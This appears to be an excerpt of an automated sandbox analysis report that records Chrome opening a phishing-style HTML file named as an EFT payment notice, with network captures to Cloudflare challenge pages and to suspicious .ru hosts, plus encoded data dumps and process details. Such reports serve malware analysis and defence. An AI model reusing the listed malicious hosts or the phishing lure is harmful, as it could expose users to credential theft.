                                                                2025-01-13 19:55:06 UTC16384OUTData Raw: 6d 24 6d 73 45 31 73 4f 61 6d 2d 6d 5a 44 38 56 47 35 78 47 4c 61 32 7a 35 39 6d 78 5a 32 75 6d 4e 35 47 5a 4c 66 5a 4f 6d 61 61 6d 64 6d 65 64 4c 61 6d 57 6d 77 45 73 6d 73 41 6d 75 35 7a 62 73 53 6d 54 6d 6a 33 2b 75 6d 33 35 4d 54 32 56 6d 52 35 78 47 32 37 35 57 4e 6f 5a 32 78 35 30 6d 50 44 32 32 5a 6c 35 32 78 6d 61 6d 66 47 24 6c 73 57 56 2b 6d 37 37 73 62 6d 62 62 4f 66 73 62 6d 32 45 6d 31 6d 39 6d 42 48 61 56 32 6f 5a 2b 6d 75 45 6d 46 6d 4b 35 24 4a 6d 73 6d 24 6d 49 56 31 4b 6d 7a 6d 55 56 31 47 32 61 6d 61 70 32 47 32 6a 6d 67 5a 31 4b 6d 36 6d 33 56 78 43 32 54 6d 6a 56 78 69 32 31 35 61 61 78 47 32 77 6d 39 5a 24 50 46 68 6d 39 61 31 72 32 30 35 55 5a 31 79 32 56 35 51 61 75 64 32 4b 35 67 45 32 72 6d 50 6d 4a 35 6d 48 6d 76 6d 37 37 6d 37
                                                                Data Ascii: m$msE1sOam-mZD8VG5xGLa2z59mxZ2umN5GZLfZOmaamdmedLamWmwEsmsAmu5zbsSmTmj3+um35MT2VmR5xG275WNoZ2x50mPD22Zl52xmamfG$lsWV+m77sbmbbOfsbm2Em1m9mBHaV2oZ+muEmFmK5$Jmsm$mIV1KmzmUV1G2amap2G2jmgZ1Km6m3VxC2TmjVxi215aaxG2wm9Z$PFhm9a1r205UZ1y2V5Qaud2K5gE2rmPmJ5mHmvm77m7
                                                                2025-01-13 19:55:06 UTC2140OUTData Raw: 73 6d 73 35 24 2d 6c 75 5a 55 6d 57 44 49 4d 6c 38 52 59 6a 49 51 4a 66 37 4a 64 74 61 6d 2b 6d 24 57 44 73 6d 38 72 37 2b 31 72 48 66 69 2d 61 32 74 70 49 36 4a 54 65 59 4e 54 4c 47 31 6d 56 52 44 56 78 5a 32 5a 7a 6a 6e 55 55 35 46 6d 76 6e 72 56 4c 61 56 24 45 78 53 77 67 77 4e 6d 4c 6e 73 4f 44 4d 5a 57 32 4c 38 6d 6c 55 70 77 71 6c 44 4b 56 57 58 37 63 6c 59 74 61 56 6d 68 46 6d 35 37 39 75 30 4a 6d 35 24 72 74 49 5a 53 56 61 48 75 4f 4b 30 62 78 68 34 65 6d 70 67 6a 58 41 31 64 30 4f 67 74 6d 61 35 61 72 56 31 4c 6a 42 74 30 6c 45 69 69 6d 59 6c 51 58 54 68 6d 6d 35 37 56 32 68 44 4d 4a 78 49 6e 24 31 4a 5a 57 4c 49 74 49 74 52 34 74 4c 67 39 58 74 57 39 4c 47 77 37 63 56 61 32 61 24 4d 47 70 52 6d 2b 6d 71 5a 24 39 31 69 35 6d 35 61 67 47 75 4e 6a
                                                                Data Ascii: sms5$-luZUmWDIMl8RYjIQJf7Jdtam+m$WDsm8r7+1rHfi-a2tpI6JTeYNTLG1mVRDVxZ2ZzjnUU5FmvnrVLaV$ExSwgwNmLnsODMZW2L8mlUpwqlDKVWX7clYtaVmhFm579u0Jm5$rtIZSVaHuOK0bxh4empgjXA1d0Ogtma5arV1LjBt0lEiimYlQXThmm57V2hDMJxIn$1JZWLItItR4tLg9XtW9LGw7cVa2a$MGpRm+mqZ$91i5m5agGuNj
                                                                2025-01-13 19:55:07 UTC1347INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:55:07 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 4624
                                                                Connection: close
                                                                cf-chl-out: kRSa9jxlMy+4WmDv0aNLVClV9yj6qWGO0tAEh3CINhzoBzrdUxfe8eg68e67ulFVz8VuWY8qVTFDxukTHXv7iS2BiGbyItPqKTAVc8TUY1E=$dsshxcLs2j8sFoqPu9hYSA==
                                                                cf-chl-out-s: g7kMr3jTvbL8Ojh0Eo/ZdEUeaGQS9v47BGLex9Qtgt2EWsFYSQS0T6r0XFp/2GGb9pdzf2bBRuwMierEcdFyTeVuQbHK2zMBW/DOnjN9kceGn5CCQ10WZOtbN/Ql/4k4nBZCy/9Dd6sggdSctFlVZM/7luTsBAjmwsYsyuYH2J1f/pbvrjR1ooo6epk54/0Q59TJ7Cm9172WCBTyHhVJCPcb3Mlh9zplwYSX0DUjTZiXYDegpz5Te+SowmhTDuegMSlQCZuqBnocsOuZDrmdxffxv8YDBuBgFgUDPGcBKGrRknNO9DLT4ZTzgHRbPqZLyQGzoi8ADPcjxgq07Ej0s8KrM0HYFAsFGC1f/jTfWDuUOQ9AjaV8Vm1O1E2IQTEiLlEsFxHIskYvjjRn0MYKD1uYo9ujIVIm1fJlK44kICFL62clJi0keKlXB6Zmzc4dAB/2K06YSSLAtnYArJxMgju6FrRN+BgV8MDk+1/EIO0I0xxAxRebhq/khicPL0zN+GmY69e+v+MDa0R6FaLsJxfYDyM1GT/9qILHMGu8xOg1HIvWQxBJfkwaSW/2Ot6vTOCRtDFwH+w0SYoj0ddF+Ds/gNpeSPvd7/69iVHeoIy4IFuO4UMGda5FnwvyMhtK3TtO6vEqDAgdiUBOxAoFcIJd6veMCkkpmUZ5w22MioOk3uSOxIOYFG6HxS0KqaT1iflPHycwETX+nRRGaeksfgxQKByWu4lFG0zqvm9+Qah7bS6J4zwqW2S3yEB0ITT9I+FTLWLeMD0dJmdxxDHwGUIFQFYFOYOes9SG0fXkBS+ZiZ3U0kXfGzzKkk8D7/0Gz3gAdVzdx8pbRkNKeHuVdv8e+fkCwiqh0xZLAfBEBECPR9v7YnSvRHFInhHZAQTo5mDnttfAaZZn3nM+6Ij94kqIfrIo7lD5leE8BXiWqO6SXYbJul9h8XWsr4Zm4ORg8stY+2+YR4S7P22rRolw8Ir5Rwtjs5qSwiVQKNxOZMA=$osYCt [TRUNCATED]
                                                                Server: cloudflare
                                                                2025-01-13 19:55:07 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 39 30 31 37 66 31 32 38 38 65 38 36 63 33 35 38 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                Data Ascii: CF-RAY: 9017f1288e86c358-EWRalt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:55:07 UTC1329INData Raw: 6b 63 56 33 74 4a 53 66 73 35 2b 58 6c 4d 4f 6c 6a 34 2b 6e 79 4b 32 6f 31 74 4b 52 78 4e 72 4a 6c 4c 4f 74 78 37 66 49 71 62 36 32 6d 74 50 63 73 63 48 5a 70 65 6d 70 77 72 37 75 72 39 37 62 72 73 6a 69 33 36 2f 7a 38 73 6d 7a 72 72 76 2b 7a 51 49 43 38 4e 4d 43 37 39 76 52 39 76 50 62 76 66 7a 45 34 41 37 4e 37 75 49 56 41 75 6a 31 7a 73 72 6f 2b 75 6b 65 43 67 33 73 39 2f 58 35 31 52 4c 39 38 66 45 54 41 43 6f 47 41 52 38 6f 36 68 34 46 44 65 73 67 4b 79 62 76 37 67 6b 37 43 6a 34 55 4c 51 2f 32 49 68 6f 44 2b 6a 78 47 45 6a 59 68 54 42 55 6c 4f 43 42 4f 44 67 6f 6a 56 55 41 74 52 31 56 43 55 46 74 54 50 6a 39 50 49 46 78 53 4f 55 46 43 58 6b 39 61 4d 6a 35 43 56 6a 34 6d 56 79 35 53 52 32 68 45 53 6c 41 2f 59 69 74 72 4e 6d 6c 64 62 6b 39 76 65 6b 39
                                                                Data Ascii: kcV3tJSfs5+XlMOlj4+nyK2o1tKRxNrJlLOtx7fIqb62mtPcscHZpempwr7ur97brsji36/z8smzrrv+zQIC8NMC79vR9vPbvfzE4A7N7uIVAuj1zsro+ukeCg3s9/X51RL98fETACoGAR8o6h4FDesgKybv7gk7Cj4ULQ/2IhoD+jxGEjYhTBUlOCBODgojVUAtR1VCUFtTPj9PIFxSOUFCXk9aMj5CVj4mVy5SR2hESlA/YitrNmldbk9vek9
                                                                2025-01-13 19:55:07 UTC1369INData Raw: 70 79 6c 5a 4b 79 73 72 57 32 77 72 37 61 73 63 6f 32 79 72 33 4b 50 70 71 32 2b 6c 70 43 6a 67 4c 2b 50 67 59 43 62 68 36 58 49 69 71 69 61 69 70 71 73 78 4b 54 41 78 70 36 52 78 4d 71 32 6d 4e 62 4b 31 35 6a 61 32 5a 69 64 6f 72 6e 64 35 4b 62 45 31 4b 57 71 33 75 6e 75 36 73 6a 4e 38 72 4c 65 35 50 54 4e 38 2f 4c 33 75 76 50 35 2b 2b 72 5a 2f 62 2f 45 2f 75 48 41 30 75 48 2b 42 77 6b 44 41 73 7a 6c 36 39 44 4e 44 77 50 67 35 39 6a 58 35 52 76 76 44 2f 37 61 39 76 41 44 32 2b 54 65 34 65 44 61 35 2f 6a 2b 47 52 38 66 41 67 63 6a 42 44 44 6d 42 52 4c 7a 4d 69 38 74 39 68 45 4f 4f 2f 73 73 4d 7a 54 2b 4d 52 30 59 52 54 51 4a 51 30 67 67 4b 54 6b 48 55 53 55 72 55 51 63 70 52 42 52 44 4f 53 56 61 48 54 55 2b 4d 46 77 62 5a 47 51 2f 51 54 77 6b 61 53 56 63
                                                                Data Ascii: pylZKysrW2wr7asco2yr3KPpq2+lpCjgL+PgYCbh6XIiqiaipqsxKTAxp6RxMq2mNbK15ja2Zidornd5KbE1KWq3unu6sjN8rLe5PTN8/L3uvP5++rZ/b/E/uHA0uH+BwkDAszl69DNDwPg59jX5RvvD/7a9vAD2+Te4eDa5/j+GR8fAgcjBDDmBRLzMi8t9hEOO/ssMzT+MR0YRTQJQ0ggKTkHUSUrUQcpRBRDOSVaHTU+MFwbZGQ/QTwkaSVc
                                                                2025-01-13 19:55:07 UTC1369INData Raw: 71 4b 6a 71 69 65 70 61 32 72 6d 72 75 75 6e 71 6d 63 6a 61 2b 41 72 4a 47 61 6e 36 4f 42 6b 72 6d 71 68 70 58 50 72 35 71 6c 6b 5a 32 47 6a 61 6d 57 74 73 2f 55 75 5a 4c 47 7a 4c 79 38 30 35 32 39 77 61 32 6a 31 61 6a 62 75 74 76 6a 36 63 33 6a 32 4b 37 61 36 64 33 48 35 66 61 7a 31 63 62 52 73 75 6e 51 36 4d 2f 71 2b 4d 30 43 42 73 51 49 41 67 76 63 42 77 73 48 2f 41 33 50 42 2f 48 4f 78 67 37 4e 47 4f 76 50 39 74 54 78 32 2f 66 5a 39 68 73 63 33 74 59 58 45 76 4d 56 41 52 73 71 4a 79 62 6c 36 53 30 4a 48 43 2f 79 4a 75 34 34 4e 53 67 49 2b 68 45 33 49 50 77 56 4b 78 39 44 51 53 45 6b 41 45 55 64 4a 67 51 69 4a 55 34 49 4b 54 45 72 54 78 4d 52 4a 6c 63 74 4d 69 6f 55 48 56 4d 78 58 30 77 30 48 31 38 37 4d 56 34 79 55 7a 30 30 4a 45 59 36 50 32 74 76 57
                                                                Data Ascii: qKjqiepa2rmruunqmcja+ArJGan6OBkrmqhpXPr5qlkZ2GjamWts/UuZLGzLy80529wa2j1ajbutvj6c3j2K7a6d3H5faz1cbRsunQ6M/q+M0CBsQIAgvcBwsH/A3PB/HOxg7NGOvP9tTx2/fZ9hsc3tYXEvMVARsqJybl6S0JHC/yJu44NSgI+hE3IPwVKx9DQSEkAEUdJgQiJU4IKTErTxMRJlctMioUHVMxX0w0H187MV4yUz00JEY6P2tvW
                                                                2025-01-13 19:55:07 UTC557INData Raw: 71 65 6e 57 6e 71 6e 35 35 67 4d 4b 63 66 62 4b 75 78 6f 4b 64 68 6f 4f 58 74 35 32 6f 6d 62 7a 47 79 34 71 72 6f 4d 47 52 31 4c 53 6b 31 71 2b 34 33 70 62 5a 34 73 37 68 6c 75 4c 55 73 4c 44 62 75 4b 50 6d 31 75 33 75 78 75 32 75 73 4f 32 79 72 63 43 32 36 74 58 44 75 72 61 35 75 39 62 51 41 63 44 79 37 76 72 45 34 4f 54 6e 44 41 6a 59 32 41 34 41 34 41 62 4c 41 73 38 45 46 64 59 55 37 42 73 5a 38 39 6e 59 48 78 73 6a 33 76 33 7a 4b 4e 33 39 4a 75 6a 69 4a 67 55 6c 37 69 30 62 4a 2f 41 66 4a 79 4c 7a 4a 53 38 61 2b 6a 62 76 51 41 77 39 45 51 30 2f 47 42 30 47 45 54 63 65 47 68 56 4c 50 67 6f 63 4b 55 51 66 49 45 4e 4b 45 53 52 48 4f 42 4d 6d 4e 55 6f 62 4b 6b 39 4d 4d 79 30 6a 50 6a 56 6a 5a 32 49 6a 4e 56 74 6b 4f 6a 78 66 59 69 6f 2b 62 6c 4a 47 51 58
                                                                Data Ascii: qenWnqn55gMKcfbKuxoKdhoOXt52ombzGy4qroMGR1LSk1q+43pbZ4s7hluLUsLDbuKPm1u3uxu2usO2yrcC26tXDura5u9bQAcDy7vrE4OTnDAjY2A4A4AbLAs8EFdYU7BsZ89nYHxsj3v3zKN39JujiJgUl7i0bJ/AfJyLzJS8a+jbvQAw9EQ0/GB0GETceGhVLPgocKUQfIENKESRHOBMmNUobKk9MMy0jPjVjZ2IjNVtkOjxfYio+blJGQX


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.549787104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:55:07 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1491089504:1736795691:_2M0zyAcgPOuW97IkhXnYsXlr57SU1M4wgTcK-1QGCY/9017f0c19bf64357/60hVcdymwMdF.kHrUj8sh4qMzB_LYBdwV7QA5YSJEa4-1736798090-1.1.1.1-toacKPVl_FCZPddV4C0wsyR6bPaSl0bKqxISI91DDVq0YUt2ql4_H2fb7727RIYs HTTP/1.1
                                                                Host: challenges.cloudflare.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:55:07 UTC375INHTTP/1.1 404 Not Found
                                                                Date: Mon, 13 Jan 2025 19:55:07 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 7
                                                                Connection: close
                                                                cf-chl-out: p3S9HVFZ8zcvjAh6VE5pjg==$fQNIWr3wXLhX+B1smsJjtw==
                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                Server: cloudflare
                                                                CF-RAY: 9017f12d6c0572b7-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2025-01-13 19:55:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                Data Ascii: invalid


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.549788188.114.96.34433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:55:07 UTC660OUTGET /tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXO HTTP/1.1
                                                                Host: s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: */*
                                                                Origin: https://rfll.yordickyel.ru
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Referer: https://rfll.yordickyel.ru/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:55:08 UTC888INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:55:08 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OXyBQojTsEz9a7FtWSnG4teSQJIRpVOJAsy2ibYsJ9sGQavjmuTTku2SKH0D7n8Vt0AyrPgy3RkYoEba9dYFjJQeNtVktI0v5jD0GIoWj4vw%2FkKRLWP3ma1VitTYhjztfad9PAih1TphzXtcb2wrlOba0GiIQF5QmUw%2FsSpQJBzJTHBS8DfvNScaXFkg%2BaspOd0cfqU%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9017f12e3d214386-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1656&min_rtt=1567&rtt_var=767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1238&delivery_rate=1277899&cwnd=246&unsent_bytes=0&cid=c9988b5a574c8e14&ts=589&x=0"
                                                                2025-01-13 19:55:08 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                Data Ascii: 11
                                                                2025-01-13 19:55:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.549801188.114.97.34433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-13 19:55:09 UTC450OUTGET /tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXO HTTP/1.1
                                                                Host: s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-01-13 19:55:10 UTC892INHTTP/1.1 200 OK
                                                                Date: Mon, 13 Jan 2025 19:55:10 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TcyCwXe3CXioroDuD6Mvzl6pI%2BaLemua67vh%2ByPN53a9Oyqv2yXalGnNIrvJdKngUfzC5IMtZkcdVM4JDloCvDsrXOGY%2FInRTrDn4fMxN3clZhk0ZOKVNaqds%2BzOp%2FS6CuFULb3FAw78RBzaVopA40qTqgMh2RC6DQkOb33kfmOpSW09WSPazvI5uYR8m35AXAnTDR4%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 9017f1395ec18cc8-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1987&min_rtt=1980&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1028&delivery_rate=1433480&cwnd=237&unsent_bytes=0&cid=ebf9a67a1fc8f1a1&ts=592&x=0"
                                                                2025-01-13 19:55:10 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                Data Ascii: 11
                                                                2025-01-13 19:55:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:14:54:40
                                                                Start date:13/01/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\EFT_Payment_Notification_Warriorsheart.html"
                                                                Imagebase:0x7ff715980000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                Target ID:2
                                                                Start time:14:54:43
                                                                Start date:13/01/2025
                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1820,i,6564301633769382234,10508467328099275004,262144 /prefetch:8
                                                                Imagebase:0x7ff715980000
                                                                File size:3'242'272 bytes
                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                No disassembly